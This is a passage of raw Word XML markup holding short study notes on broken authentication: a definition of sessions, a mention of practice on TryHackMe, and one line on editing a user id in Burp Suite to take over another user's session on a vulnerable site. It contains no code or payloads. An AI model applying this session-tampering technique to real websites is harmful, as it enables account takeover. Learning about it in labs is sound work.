      <w:r w:rsidRPr="00E277DE">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>organisation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E277DE">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD73A5B" w14:textId="6DF04AF8" w:rsidR="00E277DE" w:rsidRDefault="00E277DE"/>
    <w:p w14:paraId="435EE05F" w14:textId="77777777" w:rsidR="00E277DE" w:rsidRPr="00E277DE" w:rsidRDefault="00E277DE" w:rsidP="00E277DE">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E277DE">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Section 7 - Broken authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D28078" w14:textId="77777777" w:rsidR="00E277DE" w:rsidRPr="00E277DE" w:rsidRDefault="00E277DE" w:rsidP="00E277DE">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto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1.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E277DE">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Broken authentication theory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B973AE9" w14:textId="77777777" w:rsidR="00E277DE" w:rsidRPr="00E277DE" w:rsidRDefault="00E277DE" w:rsidP="00E277DE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It is the most common attacks and vulnerabilities in past years now.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BBC2C7" w14:textId="77777777" w:rsidR="00E277DE" w:rsidRPr="00E277DE" w:rsidRDefault="00E277DE" w:rsidP="00E277DE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It usually happens in sessions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152C26BC" w14:textId="77777777" w:rsidR="00E277DE" w:rsidRPr="00E277DE" w:rsidRDefault="00E277DE" w:rsidP="00E277DE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Sessions: It is a sequence of network transactions o network requests associated to the same user for a certain period of time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D6B6FD" w14:textId="77777777" w:rsidR="00E277DE" w:rsidRPr="00E277DE" w:rsidRDefault="00E277DE" w:rsidP="00E277DE">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto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2.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E277DE">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Broken Authentication On </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E277DE">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>TryHackMe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1D36E6B2" w14:textId="77777777" w:rsidR="00E277DE" w:rsidRPr="00E277DE" w:rsidRDefault="00E277DE" w:rsidP="00E277DE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 xml:space="preserve">Broken authentication is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E277DE">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>practised</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E277DE">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> on try hack me website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3D0BE3" w14:textId="77777777" w:rsidR="00E277DE" w:rsidRPr="00E277DE" w:rsidRDefault="00E277DE" w:rsidP="00E277DE">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto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3.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E277DE">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Broken Authentication Via Cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FDD968" w14:textId="77777777" w:rsidR="00E277DE" w:rsidRPr="00E277DE" w:rsidRDefault="00E277DE" w:rsidP="00E277DE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 xml:space="preserve">In </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E277DE">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>burpsuite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E277DE">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> we can change the user id to change the sessions according to another user on a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E277DE">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>vunerable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E277DE">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338A51BC" w14:textId="77777777" w:rsidR="00E277DE" w:rsidRPr="00E277DE" w:rsidRDefault="00E277DE" w:rsidP="00E277DE">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto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4.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E277DE">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Basic Authorization in HTTP Request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6E62CD" w14:textId="77777777" w:rsidR="00E277DE" w:rsidRPr="00E277DE" w:rsidRDefault="00E277DE" w:rsidP="00E277DE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E277DE">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>It is another attack on the broken authentication and this one will be aimed at authorization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36790C86" w14:textId="77777777" w:rsidR="00E277DE" w:rsidRDefault="00E277DE"/>
    <w:sectPr w:rsidR="00E27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B0734" w14:textId="77777777" w:rsidR="00CD325B" w:rsidRDefault="00CD325B" w:rsidP="00E277DE">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="272CD516" w14:textId="77777777" w:rsidR="00CD325B" w:rsidRDefault="00CD325B" w:rsidP="00E27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C3F2A" w14:textId="77777777" w:rsidR="00CD325B" w:rsidRDefault="00CD325B" w:rsidP="00E277DE">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7B3C4A07" w14:textId="77777777" w:rsidR="00CD325B" w:rsidRDefault="00CD325B" w:rsidP="00E27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94616"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1528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3B3714"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7D26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A0631C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CD40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2F79EE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C5B2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B229E7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9BE4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9C76BD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DF0A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262289"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4890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EB43B9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AA08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64327F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C69C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1130A6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F41A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FE68D1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A8EC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875EED"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D6D0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0423A0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E928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4D32CE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6EFA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6C521C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6D14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302FDB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3466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78665B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D7C2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643204"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0408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1E72C4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2398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303BD9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8840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6"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="1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8F"/>
    <w:rsid w:val="007C592C"/>
    <w:rsid w:val="00CD325B"/>
    <w:rsid w:val="00E277DE"/>
    <w:rsid w:val="00F9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6A045"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{386D73CF-9F27-41EC-8BA9-37DBD7B7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77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9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3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3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u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PS, Akhil</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>PS, Akhil</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-04-28T11:09:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-04-28T11:10:00Z</dcterms:modified>
</cp:coreProperties>
</file>